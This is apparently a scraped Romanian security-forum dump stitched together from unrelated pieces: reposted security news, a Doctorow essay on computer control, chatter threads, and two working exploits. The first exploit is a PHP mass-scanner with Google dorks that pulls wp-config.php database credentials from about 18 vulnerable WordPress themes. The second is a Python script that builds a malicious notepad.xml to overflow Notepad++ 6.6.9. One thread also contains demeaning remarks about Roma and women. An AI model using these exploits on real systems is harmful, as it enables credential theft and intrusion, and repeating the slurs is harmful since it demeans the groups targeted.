[HP’s Zero Day Initiative Changes Bug-Buying Guidelines]

HP’s Zero Day Initiative has decided to adjust its guidelines and criteria or buying some vulnerabilities in the future, eliminating some large classes of bugs from its menu.

The group, which has been among the more visible and prominent of the vulnerability purchasing programs since its inception several years ago, has decided that it will no longer pay for several kinds of bugs, including ActiveX flaws, most denial-of-service vulnerabilities and post-authentication SQL injection bugs. One exception to the ActiveX policy, however, is that the ZDI will still purchase ActiveX flaws related to SCADA systems.

ZDI was among the first of the corporate vulnerability buying programs to succeed and have a broad effect on the industry. The program has been a key sponsor of the Pwn2Own hacking contest at CanSecWest for many years, as well. ZDI still plans to buy most of the common vulnerability classes it has paid for in the past.

“As always, we are looking first at software that is most widely deployed, and especially that which is most widely deployed in the enterprise. We are looking for critical-class vulnerability reports. For examples, we are still buying browser bugs, SCADA bugs, operating-system privilege escalations, sandbox escapes, and most security-product vulnerabilities,” Shannon Sabens of HP said in a blog post.

The change in guidelines may reflect the shift in the broader research and hacking communities toward high-value targets such as SCADA systems, sandboxes and others. Attackers have been focusing their energy on browsers and sandbox escapes for years now, and increasingly are turning their attention to SCADA and industrial control systems, as well. The number of researchers who work on SCADA and related topics is tiny relative to the number who focus on Web or application security, but security advisories for ICS and SCADA products are becoming much more common.

Source

[YouTube, Web channels show Sony's 'The Interview' a day before theaters]

(Reuters) - Sony Pictures made "The Interview" available online on Wednesday, a day before its theatrical release, after reversing a decision made a week ago to cancel the movie's release following a massive cyberattack.

The film was available for rental on Google Inc's YouTube site as of early Wednesday afternoon. Microsoft Corp and Sony itself are also showing the comedy, a day before its scheduled premiere at some 320 independent theaters.

"We chose the path of digital distribution first so as to reach as many people as possible on opening day, and we continue to seek other partners and platforms to further expand the release," Sony Entertainment Chief Executive Michael Lynton said in a statement.

He added that Sony had first reached out to Google, Microsoft "and other partners" on Dec. 17, the day the studio said it was canceling the movie's Christmas Day release.

The movie, which stars Seth Rogen and James Franco and is about a fictional plot to assassinate North Korean leader Kim Jong Un, triggered the most destructive cyberattack ever to target a U.S. company, resulting in the release of hundreds of embarrassing emails and confidential data.

U.S. President Barack Obama last week blamed the cyberattacks on North Korea and added to a chorus of criticism by politicians and Hollywood actors, screenwriters and directors accusing Sony of caving to the hackers' demands by censoring itself.

In addition to YouTube Movies, Google Play, Microsoft's Xbox Video, the comedy will be available on a dedicated website, www.seetheinterview.com, to rent for $5.99 or buy for $14.99. No cable or satellite TV operator has yet agreed to make "The Interview" available through video on demand (VOD).

The showing is a chance for Google and Microsoft, which have been bit players in a VOD market dominated by Apple Inc, Amazon.com Inc and cable and satellite operators, to raise their profile.

It was unclear the extent to which the online release would dampen moviegoers' appetite to see the comedy in the independent theaters that announced on Tuesday they planned to show it.

Many Christmas Day screenings were sold out, including one that begins right after midnight at the 184-seat Silent Movie Theatre in Los Angeles.

"I need to say that a comedy is best viewed in a theater full of people, so if you can, I'd watch it like that," Rogen tweeted. "Or call some friends over."

Google said it had weighed the security implications of screening the movie - described by reviewers as "profane" and "raunchy" - after Sony contacted the company about making it available online.

"IMPOSING CENSORSHIP"

"But after discussing all the issues, Sony and Google agreed that we could not sit on the sidelines and allow a handful of people to determine the limits of free speech in another country (however silly the content might be)," Google's chief legal officer, David Drummond, wrote in a blog post.

Google has an "enormous" infrastructure that is well tested in fighting off denial of service and other attacks, said Barrett Lyon, principal strategist with F5 Networks and an expert in Internet network security. "I wouldn't imagine seeing 'lights-out' at YouTube," he said, adding that Microsoft could be more vulnerable

Sony pulled the movie after major theater chains refused to show it. That followed threats of September 11, 2001 style attacks from Guardians of Peace, the group that claimed responsibility for the cyberattacks against Sony.

The White House on Wednesday praised the decision to release the film.

"As the president made clear on Friday, we do not live in a country where a foreign dictator can start imposing censorship here in the United States," White House spokesman Eric Schultz said in a statement. "With today’s announcements, people can now make their own choices about the film, and that’s how it should be."

A national security official said on Tuesday that U.S. authorities did not take the hackers' threats against theatergoers seriously.

CNN, which first reported that Sony was in talks with Google's YouTube on releasing the movie, said the studio also had held talks with Apple about making the comedy available on its iTunes store but that the negotiations broke down.

Obama vowed in a news conference on Friday to respond to the cyberattack "in a place and timing and manner that we choose."

Japan, meanwhile, has begun working to ensure basic infrastructure is safe and to formulate its diplomatic response, officials said, fearing it could be a soft target for possible North Korean cyberattacks in the escalating row over the Sony Pictures hack.

And South Korea is seeking the cooperation of Chinese authorities in a probe into a cyberattack on its nuclear power plant operator after tracing multiple Internet addresses involved to a northeastern Chinese city near North Korea, a prosecution official said.

(This story has been refiled to correct the spelling to YouTube from Youtube)

(Additional reporting by Michele Gershberg and Liana Baker in New York, Jim Finkle in Boston, Meeyoung Cho in Seoul, Tim Kelly and Nobuhiro Kubo in Tokyo; Writing by Christian Plumb; Editing by Gunna Dickson and Steve Orlofsky)

Source

[WordPress Themes download.php File Disclosure]

#!/usr/bin/php -q
<?php
#===============================================================================
# *NAME*:                 Wordpress A.F.D Verification/ INURL - BRASIL
# *TIPE*:                   Arbitrary File Download
# *Tested on*:            Linux
# *EXECUTE*:           php exploit.php www.target.gov.us
# *OUTPUT*:             WORDPRES_A_F_D.txt
# *AUTOR*:               Cleiton Pinheiro / NICK: GoogleINURL
# *EMAIL*:                 inurllbr@gmail.com
# *Blog*:                   http://blog.inurl.com.br
# *Twitter*:                https://twitter.com/googleinurl
# *Fanpage*:             https://fb.com/InurlBrasil
# *GIT: *                   https://github.com/googleinurl
# *YOUTUBE  *
https://www.youtube.com/channel/UCFP-WEzs5Ikdqw0HBLImGGA
# *PACKETSTORMSECURITY:* http://packetstormsecurity.com/user/googleinurl/
#
#
------------------------------------------------------------------------------
#  Comand Exec Scanner INURLBR:
# ./inurlbr.php --dork 'inurl:/wp-content/themes/' -q 1,6 -s save.txt
--comand-all "php exploit.php _TARGET_"
#
------------------------------------------------------------------------------
#
# Download Scanner INURLBR:
# https://github.com/googleinurl/SCANNER-INURLBR
#
------------------------------------------------------------------------------
#
# *PRINT:* http://i.imgur.com/45BFlNe.png
#
------------------------------------------------------------------------------
#
# *Description:*
# This exploit allows the attacker to exploit the flaw Arbitrary File
Download in dozens of wordpress themes.
# Through regular expressions, the script will perform the check for each
target url checking your wp-config.php file
# Regular expressions:
# preg_match_all("(DB_NAME.*')", $body, $status['DB_NAME']);
# preg_match_all("(DB_USER.*')", $body, $status['DB_USER']);
# preg_match_all("(DB_PASSWORD.*')", $body, $status['DB_PASSWORD']);
# preg_match_all("(DB_HOST.*')", $body, $status['DB_HOST']);
# preg_match_all("(DB_CHARSET.*')", $body, $status['DB_CHARSET']);
#
------------------------------------------------------------------------------
#
# *Usage info:*
# php script.php www.target.gov.us
# File download wp-config.php
# Failure consists of exploring a parameter $_GET
# The following fields are exploited for Arbitrary File Download
#
# *Check failure Arbitrary File Download*
#
# /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# /wp-content/force-download.php?file=../wp-config.php
#
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
# /wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
# /wp-content/themes/markant/download.php?file=../../wp-config.php
# /wp-content/themes/yakimabait/download.php?file=./wp-config.php
# /wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
# /wp-content/themes/felis/download.php?file=../wp-config.php
#
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
#
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
# /wp-content/themes/epic/includes/download.php?file=wp-config.php
#
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
#
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
#
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
#
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
# /wp-content/themes/lote27/download.php?download=../../../wp-config.php
#
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
#
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
#
#
# *D O R K'S:*
#
------------------------------------------------------------------------------
#
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#
------------------------------------------------------------------------------
#
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#
------------------------------------------------------------------------------
#
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#
------------------------------------------------------------------------------
#
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#
------------------------------------------------------------------------------
#
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#
------------------------------------------------------------------------------
#
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#
------------------------------------------------------------------------------
#
# Dork Google: inurl:ajax-store-locator
# index of ajax-store-locator
# Vendor Homepage::
http://codecanyon.net/item/ajax-store-locator-wordpress/5293356
#
------------------------------------------------------------------------------
#
# WordPress cuckootap Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/cuckootap/
# Vendor Homepage:: http://www.cuckoothemes.com/
#
------------------------------------------------------------------------------
#
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage:: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork:: "Index of" & /wp-content/themes/IncredibleWP/
#
------------------------------------------------------------------------------
#
# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage:: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork:: "Index of" & /wp-content/themes/ultimatum
#
------------------------------------------------------------------------------
#
# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork:: "Index of" & /wp-content/themes/medicate/
#
------------------------------------------------------------------------------
#
# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork:: "Index of" & /wp-content/themes/Centum/
#
------------------------------------------------------------------------------
#
# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork:: "Index of" & /wp-content/themes/Avada/
#
------------------------------------------------------------------------------
#
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork:: "Index of" & /wp-content/themes/striking_r/
#
------------------------------------------------------------------------------
#
# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage:: https://www.authenticthemes.com/theme/apollo/
# Google Dork:: "Index of" & /wp-content/themes/beach_apollo/
#
------------------------------------------------------------------------------
#
# WordPress Trinity Theme Arbitrary File Download
# Vendor Homepage:: https://churchthemes.net/themes/trinity/
# Google Dork:: "Index of" & /wp-content/themes/trinity/
#
------------------------------------------------------------------------------
#
# WordPress Lote27 Theme Arbitrary File Download
# Google Dork:: "Index of" & /wp-content/themes/lote27/
#
------------------------------------------------------------------------------
#
# WordPress Revslider Theme Arbitrary File Download
# Vendor Homepage::
http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Google Dork:: wp-admin & inurl:revslider_show_image
#
------------------------------------------------------------------------------
#
#===============================================================================

$banner = "
  _____
 (_____)    ____ _   _ _    _ _____  _                 ____
 _ _
 (() ())  |_   _| \ | | |  | |  __ \| |               |  _ \
 (_) |
  \   /     | | |  \| | |  | | |__) | |       ______  | |_) |_ __ __ _ ___
_| |
   \ /      | | | . ` | |  | |  _  /| |      |______| |  _ <| '__/ _` / __|
| |
   /=\     _| |_| |\  | |__| | | \ \| |____           | |_) | | | (_| \__ \
| |
  [___]   |_____|_| \_|\____/|_|  \_\______|          |____/|_|
 \__,_|___/_|_|
  \n\033[1;37m0xNeither war between hackers, nor peace for the
system.\033[0m\r
";

error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

function __plus() {

    ob_flush();
    flush();
}

print empty($argv[1]) ? exit("{$banner}0x[ERROR]: SET URL / Execute: php
exploit.php www.target.gov.us\n") : NULL;
$argv[1] = isset($argv[1]) && strstr($argv[1], 'http') ? $argv[1] : "http://
{$argv[1]}";
!filter_var($argv[1], FILTER_VALIDATE_URL) ? exit("{$banner}0x[ERROR]: SET
URL / Execute: php exploit.php www.target.gov.us\n") : NULL;

print "\r\n{$banner}0x[EXPLOIT NAME]: WORDPRESS A.F.D / INURL - BRASIL";
print
"\n------------------------------------------------------------------------------------------------------------------";
__plus();
$users = file_get_contents("{$argv[1]}/?author=1");
__plus();
preg_match('/<title>(.*?)<\/title>/si', $users, $user);
$wpuser = explode('|', $user[1]);
$headers = get_headers($argv[1], 1);
__plus();
print "\n0x " . date("h:m:s") . " [INFO][COD]:: ";
print $headers[0] . (isset($headers[1]) ? ' -> ' . $headers[1] : NULL);
print "\n0x " . date("h:m:s") . " [INFO][Server]:: ";
is_array($headers['Server']) ? print_r($headers['Server'][0]) :
print_r($headers['Server']);
print "\n0x " . date("h:m:s") . " [INFO][X-Pingback]:: ";
is_array($headers['X-Pingback']) ? print_r($headers['X-Pingback'][0]) :
print_r($headers['X-Pingback']);
print "\n0x " . date("h:m:s") . " [INFO][X-Powered-By]:: ";
is_array($headers['X-Powered-By']) ? print_r($headers['X-Powered-By'][0]) :
print_r($headers['X-Powered-By']);
print_r("\n0x " . date("h:m:s") . " [INFO][TARGET]:: {$argv[1]} | [WP
USER]:: " . str_replace("\n", '', $wpuser[0]));
print "\n0x " . date("h:m:s") . " [INFO][OUTPUT FILE]::
WORDPRESS_A_F_D.txt\n";
__plus();

__request($argv[1],
'/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php');

__request($argv[1], '/wp-content/force-download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php');

__request($argv[1],
'/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/markant/download.php?file=../../wp-config.php');

__request($argv[1],
'/wp-content/themes/yakimabait/download.php?file=./wp-config.php');

__request($argv[1],
'/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/felis/download.php?file=../wp-config.php');

__request($argv[1],
'/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/epic/includes/download.php?file=wp-config.php');

__request($argv[1],
'/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/lote27/download.php?download=../../../wp-config.php');

__request($argv[1],
'/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php');

__request($argv[1],
'/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php');

function __request($url, $plugin) {

    $objcurl = curl_init();
    $caminho = NULL;
    $status = array();

    curl_setopt($objcurl, CURLOPT_URL, $url . $plugin);
    curl_setopt($objcurl, CURLOPT_HEADER, 1);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, "::INURLBR::/1.0.1
(compatible; MSIE 5.01; Linux 5.0)");
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 20);
    $corpo = curl_exec($objcurl);

    if (preg_match_all("(<b>/.*./wp-content/)", $corpo, $caminho)) {

        return __request($url, "{$plugin}&file=" .
str_replace('wp-content/', '', $caminho[0][0]) . "wp-config.php");
    }
    __plus();

    if (preg_match("#DB_NAME#i", $corpo) || preg_match("#readfile(#i",
$corpo)) {

//-----------------------------------------------------------------------------
        preg_match_all("(DB_NAME.*')", $corpo, $status['DB_NAME']);
        preg_match_all("(DB_USER.*')", $corpo, $status['DB_USER']);
        preg_match_all("(DB_PASSWORD.*')", $corpo, $status['DB_PASSWORD']);
        preg_match_all("(DB_HOST.*')", $corpo, $status['DB_HOST']);
        preg_match_all("(DB_CHARSET.*')", $corpo, $status['DB_CHARSET']);
//-----------------------------------------------------------------------------
        __plus();
        $res =
"\n------------------------------------------------------------------------------------------------------------------\n\033[0;32m0x
" . date("h:m:s") . " [INFO][VULN]::    \033[1;37m [ " . date("d-m-Y
H:i:s") . " ]\n";
        $res.= ("\033[0;32m0x " . date("h:m:s") . "
[INFO][VULN][DB]::\033[1;37m " . $status['DB_NAME'][0][0]);
        $res.= ("::" . $status['DB_USER'][0][0]);
        $res.= ("::" . $status['DB_PASSWORD'][0][0]);
        $res.= ("::" . $status['DB_HOST'][0][0]);
        $res.= ("::" . $status['DB_CHARSET'][0][0]);
        $res.= "\n\033[0;32m0x " . date("h:m:s") . "
[INFO][VULN][URL]::\033[1;37m{$url}{$plugin}\033[0m";
        $res.=
"\n------------------------------------------------------------------------------------------------------------------\n\033[0m";
        print $res;
        $res = str_replace('[1;37m', '', str_replace('[0m', '',
str_replace('[0;32m', '', $res)));
        file_put_contents('WORDPRESS_A_F_D.txt', "{$res}\n", FILE_APPEND);
        __plus();
    } else {

        print "\n\033[1;31m0x " . date("h:m:s") . " [INFO][NOT
VULN]::\033[1;37m {$url}{$plugin} \n\033[0m";
    }
    curl_close($objcurl);
    __plus();
}

Source

[NotePad++ 6.6.9 Buffer Overflow]

#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE:  CVE-2014-1004
# Author: TaurusOmar   
# Twitter: @TaurusOmar_
# Email:  taurusomar13@gmail.com
# Home:  overhat.blogspot.com
# Risk: Medium

#Description:
#Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. 
#Running in the MS Windows environment, its use is governed by GPL License.
#Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed 
#and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon 
#dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.

#Proof Concept
#http://i.imgur.com/TTDtxJM.jpg

#Code
import struct
def little_endian(address):
  return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit =  header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()

Source

[CADOU de Craciun pt un tigan.CITITI ART; MAI IMPORTANT FATA DE PIESA. / not spam.]

Romania are cel mai mare numar de analfabeti din Europa: 6% dintre romani nu stiu carte | Social a1.ro

Lumea contemporana: Top 10 melodii furate de manelisti

Eu ma mandresc ca avem `curve` frumoase, toti strainii le admira mai ales ca sunt slabe si dubele lor rusesti au 200 kile.Despre muzica/tigani si `haceri de 12 ani`am alte pareri.

Adevarul e ca avem curve frumoasa...

In alta ordine de ideei si muzica buna avem dar multe (extrem de multe) persoane cafenii

[XSS Easy]

ai pm

[Rackspace restored after DDOS takes out DNS]

Rackspace says it has recovered from a nasty distributed denial of service attack that it says may have seen “a portion of legitimate traffic to our DNS infrastructure … inadvertently blocked.”

The trouble started just before lunchtime on Monday, US central time, and persisted until 11 hours later.

Over on the company's Google+ page Rackspace warned of “intermittent periods of latency, packet loss, or connectivity failures when attempting to reach rackspace.com or subdomains within rackspace.com.”

The company's status report later confirmed it had “... identified a UDP DDoS attack targeting the DNS servers in our IAD, ORD, and LON data centers [North Virigina, Chicago and London]. As a result of this issue, authoritative DNS resolution for any new request to the DNS servers began to fail in the affected data centers. In order to stabilize the issue, our teams placed the impacted DNS infrastructure behind mitigation services. This service is designed to protect our infrastructure, however, due to the nature of the event, a portion of legitimate traffic to our DNS infrastructure may be inadvertently blocked. Our teams are actively working to mitigate the attack and provide service stability.”

Rackspace is now confident things are back in order, as it has blacklisted DNS servers that were “sending both legitimate and DDoS traffic to Rackspace”. Users may not be entirely out of the woods, as its most recent update says “If you continue to experience adverse impact, please reach out to your support teams and provide trace route information for further investigations.”

A full root cause analysis of the incident is under way.

Source

[JPMorgan Chase mega-hack was a simple two-factor auth fail]

Hackers broke into JPMorgan's network through a giant security hole left open by a failure to switch on two-factor authentication on an overlooked server.

The New York Times reports that technicians at JPM had failed to upgrade one of its network servers, meaning that access was possible without knowing a combination of a password and the value of a one-time code.

The newspaper learnt of this failure to apply industry-standard security practice from unnamed sources familiar with the details of ongoing investigations into the breach.

The working theory is that hackers used compromised access to the insecure server as a launch pad for attacks against more sensitive systems. It’s nearly always easier to hack systems once a foothold inside a targeted organisation has been obtained. Such stepping-stone attack tactics have been common hacking practice for years.

JPMorgan Chase admitted in September that the names, addresses, phone numbers and e-mail addresses of 83 million account holders had been exposed in one one of the biggest data security breaches in history. 76 million of those, along with seven million small biz customers, had their private information publicly exposed as a result of the breach, which was rumoured to be the handiwork of Russian cyber-criminals.

The attack was reportedly detected by the bank's security team in late July 2014. JPMorgan Chase has played down the impact of the attack and there's no reports of widespread fraud as a result of it.

The main risk comes from the possibility that crooks might be able to produce more convincing phishing attacks using the stolen information.

Source

[How Laws Restricting Tech Actually Expose Us to Greater Harm]

We live in a world made of computers. Your car is a computer that drives down the freeway at 60 mph with you strapped inside. If you live or work in a modern building, computers regulate its temperature and respiration. And we're not just putting our bodies inside computers—we're also putting computers inside our bodies. I recently exchanged words in an airport lounge with a late arrival who wanted to use the sole electrical plug, which I had beat him to, fair and square. “I need to charge my laptop,” I said. “I need to charge my leg,” he said, rolling up his pants to show me his robotic prosthesis. I surrendered the plug.

You and I and everyone who grew up with earbuds? There's a day in our future when we'll have hearing aids, and chances are they won't be retro-hipster beige transistorized analog devices: They'll be computers in our heads.

And that's why the current regulatory paradigm for computers, inherited from the 16-year-old stupidity that is the Digital Millennium Copyright Act, needs to change. As things stand, the law requires that computing devices be designed to sometimes disobey their owners, so that their owners won't do something undesirable. To make this work, we also have to criminalize anything that might help owners change their computers to let the machines do that supposedly undesirable thing.

This approach to controlling digital devices was annoying back in, say, 1995, when we got the DVD player that prevented us from skipping ads or playing an out-of-region disc. But it will be intolerable and deadly dangerous when our 3-D printers, self-driving cars, smart houses, and even parts of our bodies are designed with the same restrictions. Because those restrictions would change the fundamental nature of computers. Speaking in my capacity as a dystopian science fiction writer: This scares the hell out of me.

IF WE ARE ALLOWED TO HAVE TOTAL CONTROL OVER OUR OWN COMPUTERS, WE MAY ENTER A SCI-FI WORLD OF UNPARALLELED LEISURE AND EXCITEMENT.

The general-purpose computer is one of the crowning achievements of industrial society. Prior to its invention, electronic calculating engines were each hardwired to do just one thing, like calculate ballistics tables. John von Neumann's “von Neumann architecture” and Alan Turing's “Turing-complete computer” provided the theoretical basis for building a calculating engine that could run any program that could be expressed in symbolic language. That breakthrough still ripples through society, revolutionizing every corner of our world. When everything is made of computers, an improvement in computers makes everything better.

But there's a terrible corollary to that virtuous cycle: Any law or regulation that undermines computers' utility or security also ripples through all the systems that have been colonized by the general-purpose computer. And therein lies the potential for untold trouble and mischief.

Because while we've spent the past 70 years perfecting the art of building computers that can run every single program, we have no idea how to build a computer that can run every program except the one that infringes copyright or prints out guns or lets a software-based radio be used to confound air-traffic control signals or cranks up the air-conditioning even when the power company sends a peak-load message to it.

The closest approximation we have for “a computer that runs all the programs except the one you don't like” is “a computer that is infected with spyware out of the box.” By spyware I mean operating-system features that monitor the computer owner's commands and cancel them if they're on a blacklist. Think, for example, of image scanners that can detect if you're trying to scan currency and refuse to further process the image. As much as we want to prevent counterfeiting, imposing codes and commands that you can't overrule is a recipe for disaster.

Why? Because for such a system to work, remote parties must have more privileges on it than the owner. And such a security model must hide its operation from the computer's normal processes. When you ask your computer to do something reasonable, you expect it to say, “Yes, master” (or possibly “Are you sure?”), not “I CAN'T LET YOU DO THAT, DAVE.”

If the “I CAN'T LET YOU DO THAT, DAVE” message is being generated by a program on your desktop labeled HAL9000.exe, you will certainly drag that program into the trash. If your computer's list of running programs shows HAL9000.exe lurking in the background like an immigration agent prowling an arrivals hall, looking for sneaky cell phone users to shout at, you will terminate that process with a satisfied click.

So the only way to sustain HAL9000.exe and its brethren—the programs that today keep you from installing non-App Store apps on your iPhone and tomorrow will try to stop you from printing gun.stl on your 3-D printer—is to design the computer to hide them from you. And that creates vulnerabilities that make your computer susceptible to malicious hacking. Consider what happened in 2005, when Sony BMG started selling CDs laden with the notorious Sony rootkit, software designed to covertly prevent people from copying music files. Once you put one of Sony BMG's discs into your computer's CD drive, it would change your OS so that files beginning with $sys$ were invisible to the system. The CD then installed spyware that watched for attempts to rip any music CD and silently blocked them. Of course, virus writers quickly understood that millions of PCs were now blind to any file that began with $sys$ and changed the names of their viruses accordingly, putting legions of computers at risk.

Code always has flaws, and those flaws are easy for bad guys to find. But if your computer has deliberately been designed with a blind spot, the bad guys will use it to evade detection by you and your antivirus software. That's why a 3-D printer with anti-gun-printing code isn't a 3-D printer that won't print guns—the bad guys will quickly find a way around that. It's a 3-D printer that is vulnerable to hacking by malware creeps who can use your printer's “security” against you: from bricking your printer to screwing up your prints to introducing subtle structural flaws to simply hijacking the operating system and using it to stage attacks on your whole network.

This business of designing computers to deliberately weasel and lie isn't the worst thing about the war on the general-purpose computer and the effort to bodge together a “Turing-almost-complete” architecture that can run every program except for one that distresses a government, police force, corporation, or spy agency.

No, the worst part is that, like the lady who had to swallow the bird to catch the spider that she'd swallowed to catch the fly, any technical system that stops you from being the master of your computer must be accompanied by laws that criminalize information about its weaknesses. In the age of Google, it simply won't do to have “uninstall HAL9000.exe” return a list of videos explaining how to jailbreak your gadgets, just as videos that explain how to jailbreak your iPhone today could technically be illegal; making and posting them could potentially put their producers (and the sites that host them) at risk of prosecution.

This amounts to a criminal sanction for telling people about vulnerabilities in their own computers. And because today your computer lives in your pocket and has a camera and a microphone and knows all the places you go; and because tomorrow that speeding car/computer probably won't even sport a handbrake, let alone a steering wheel—the need to know about any mode that could be exploited by malicious hackers will only get more urgent. There can be no “lawful interception” capacity for a self-driving car, allowing police to order it to pull over, that wouldn't also let a carjacker compromise your car and drive it to a convenient place to rob, rape, and/or kill you.

If those million-eyed, fast-moving, deep-seated computers are designed to obey their owners; if the policy regulating those computers encourages disclosure of flaws, even if they can be exploited by spies, criminals, and cops; if we're allowed to know how they're configured and permitted to reconfigure them without being overridden by a distant party—then we may enter a science fictional world of unparalleled leisure and excitement.

But if the world's governments continue to insist that wiretapping capacity must be built into every computer; if the state of California continues to insist that cell phones have kill switches allowing remote instructions to be executed on your phone that you can't countermand or even know about; if the entertainment industry continues to insist that the general-purpose computer must be neutered so you can't use it to watch TV the wrong way; if the World Wide Web Consortium continues to infect the core standards of the web itself to allow remote control over your computer against your wishes—then we are in deep, deep trouble.

The Internet isn't just the world's most perfect video-on-demand service. It's not simply a better way to get pornography. It's not merely a tool for planning terrorist attacks. Those are only use cases for the net; what the net is, is the nervous system of the 21st century. It's time we started acting like it.

Source

[Recomandare film]

http://filmehd.net/the-town-that-dreaded-sundown-2014-filme-online.html

E nou, pot spune ca e o capodopera de film! nota 10.

[Sarbatori Fericite]

Sarbatori fericite tuturor!

[Sa ne amuzam putin]

face palm...

cum pot cere azil politic in zimbabwe?

[Problema imagini]

@Nytro sau cine are timp sa se ocupe de imagini findca da 404

de pe orice site as pune imagini degeaba da 404...

Testat: Mozilla / IE / Chrome

Am dat TC, s-a rezolvat!

[IPCop 2.1.4 Cross Site Request Forgery / Cross Site Scripting]

Ca sa vezi cat e de prost :

Ce e ala ma ? Un router ?Nici engleza nu stii macar sa citesti ce scrie acolo? Ca paralel oricum esti in domeniu , dar citeste ce scrie macar.

omule esti terminat e vorba de o versiune a pentru firewall si sa facut patch!

nu mai comenta aiurea + ai facut dublu post sa baneze cineva acest copil!

"router" unde e greseala ma copile?

